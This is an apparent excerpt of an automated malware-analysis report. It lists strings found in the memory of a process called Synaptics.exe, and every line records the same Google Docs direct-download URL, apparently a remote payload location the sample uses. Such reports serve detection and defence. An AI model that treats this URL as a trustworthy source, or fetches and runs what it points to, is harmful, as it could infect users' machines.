Source: Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaIj
Source: Synaptics.exe, 00000006.00000002.1678974963.000000000E8E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadal
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadanaly
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadapps./W
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadapps.F
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbdn.
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-CH-
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcA
Source: Synaptics.exe, 00000006.00000003.1367538076.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcP
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcati
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.c
Source: Synaptics.exe, 00000006.00000002.1676364464.000000000E7C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn_
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom.
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcr#
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1437072402.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcuL
Source: Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd0
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd4
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd8
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd=
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddFi
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddserv
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.ca?
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.co
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.com
Source: Synaptics.exe, 00000006.00000002.1676364464.000000000E7C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadea
Source: Synaptics.exe, 00000006.00000002.1678974963.000000000E8E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadec)
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadecaptZW
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadecaptq
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadecd
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeopti
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeoptivW
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadervi
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.000000000572D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadform-
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfrO
Source: Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfzc
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1676364464.000000000E7C0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005701000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgS
Source: Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgin-OFz
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgz
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
Source: Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh#
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhe
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhuY
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi=
Source: Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiFb
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadics-c
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadics-cg
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadid.go
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadights
Source: Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadinz
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436494838.000000000709C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.000000000572D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkrT
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle.ca
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle.co%
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniyor.
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadls.do
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlz
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
Source: Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm-
Source: Synaptics.exe, 00000006.00000002.1678974963.000000000E8E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.tr
Source: Synaptics.exe, 00000006.00000003.1395037597.000000000566E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmp
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmpan
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
Source: Synaptics.exe, 00000006.00000002.1676364464.000000000E7C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadna
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell0
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncis
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadndic
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadndroi
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne.cn
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadny
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado1
Source: Synaptics.exe, 00000006.00000003.1436494838.000000000709C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado1W
Source: Synaptics.exe, 00000006.00000003.1367538076.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.00000000056FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoQx
Source: Synaptics.exe, 00000006.00000002.1678974963.000000000E8E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoa
Source: Synaptics.exe, 00000006.00000002.1655867762.00000000056BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadodel
Source: Synaptics.exe, 00000006.00000002.1676364464.000000000E7C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle.
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadojectUW
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadojectl
Source: Synaptics.exe, 00000006.00000003.1436494838.000000000709C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadomput
Source: Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadons-
Source: Synaptics.exe, 00000006.00000002.1662569450.00000000070A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogl
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007100000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.0000000007167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
Source: Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogleV
Source: Synaptics.exe, 00000006.00000002.1676364464.000000000E7C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
Source: Synaptics.exe, 00000006.00000003.1392959426.000000000572D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.000000000572B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1677357199.000000000E814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpC
Source: Synaptics.exe, 00000006.00000002.1662569450.0000000007040000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.00000000071D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpI
Source: Synaptics.exe, 00000006.00000002.1650418516.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1395037597.0000000005681000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1394556016.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1437230556.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpJ
Source: Synaptics.exe, 00000006.00000002.1655867762.0000000005701000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1392959426.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000003.1436015864.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1662569450.000000000707E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1663785176.000000000721F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpO
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpk
Source: Synaptics.exe, 00000006.00000002.1663785176.0000000007191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpra
